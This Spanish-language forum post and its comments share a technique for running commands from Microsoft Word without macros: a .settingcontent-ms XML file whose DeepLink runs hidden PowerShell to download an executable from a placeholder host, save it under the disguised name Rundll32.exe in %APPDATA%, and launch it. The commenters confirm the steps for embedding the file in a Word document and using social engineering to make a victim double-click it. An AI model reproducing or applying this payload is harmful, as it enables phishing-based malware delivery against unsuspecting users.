Ejecución de comandos con Microsoft Word, sin usar macros

Acabo de ver una nueva técnica en twitter (todos los créditos para los
Autores) en la que usando un archivo de word y sin usar macros logran descargar un archivo ejecutable y correrlo con powershell en Windows, el trino en cuestión es:

El código a usar seria este

El usuario solo tendría que aceptar el siguiente dialogo

Mas o menos seria así:

Como no compartieron el código en texto plano, me tome el trabajo para esta gran comunidad de sacarlo de la imagen, aquí les dejo:

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
    <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
        <ApplicationInformation>
            <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
            <DeepLink>PowerShell -windowstyle hidden (New-Object Systam.Net.WebClient).DownloadFile('https://Pagina.com/Archivo.exe','%APPDATA%\Rundll32.exe'); Start-Process '$APPDATA\Rundll32.exe'</DeepLink>
            <Icon>%windir%\system32\control.exe</Icon>
         </ApplicationInformation>
         <SettingIdentity>
            <PageID></PageID>
            <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
         </SettingIdentity>
         <SettingInformation>
            <Description>@shell32.dll,-4161</Description>
            <Keywords>@shell32.dll,-4161</Keywords>
         </SettingInformation>
    </SearchableContent>
</PCSettings> 
Etiquetado:

Comentarios

  • editado 3 de julio

    hola @Garbage gracias por el aporte, si te entendí bien solo debo tomar ese código que compartes, cambiarle las rutas del ejecutable y guardarlo como archivo ARCHIVO.settingcontent-ms (en el articulo original lo ponen con doble extensión ARCHIVO.settingcontent.ms pero creo mas que sea como sale en la imagen ), luego arrastro ese archivo a mi documento de word, lo guardo y con algún tipo de ingeniería social incito al usuario a hacer doble click sobre dicho archivo.

    ¿es correcto este proceso?

  • @EdwinDuque efectivamente el proceso es como indicas, dejame confirmo en el laboratorio que extension es la que se debe usar, por que tengo la misma duda que tu planteas.

Accede o Regístrate para comentar.